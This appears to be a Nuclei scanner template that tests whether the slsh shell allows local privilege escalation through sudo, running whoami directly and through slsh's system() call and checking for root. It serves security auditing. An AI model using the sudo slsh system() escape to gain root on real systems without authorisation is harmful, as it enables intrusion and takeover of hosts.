slsh is a command-line shell that is designed to provide a secure environment for executing shell commands. It is often used in scenarios where security and privilege separation are important, such as in web hosting environments or when running untrusted code. slsh aims to provide a secure and restricted shell environment for executing commands.
PoC代码[已公开]
id: privesc-slsh
info:
name: slsh - Privilege Escalation
author: daffainfo
severity: high
description: |
slsh is a command-line shell that is designed to provide a secure environment for executing shell commands. It is often used in scenarios where security and privilege separation are important, such as in web hosting environments or when running untrusted code. slsh aims to provide a secure and restricted shell environment for executing commands.
reference:
- https://gtfobins.github.io/gtfobins/slsh/
metadata:
verified: true
max-request: 3
tags: code,linux,slsh,privesc,local
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
- engine:
- sh
- bash
source: |
slsh -e 'system("whoami")'
- engine:
- sh
- bash
source: |
sudo slsh -e 'system("whoami")'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4b0a00483046022100e9353f8b0fad79f74ae7745597c14bfb189c835d6e6e03119acf847a20941ccb022100b7db14742498e532740c5999723faf78360626273dba735f217b5a956ccf23b0:922c64590222798bb761d5b6d8e72950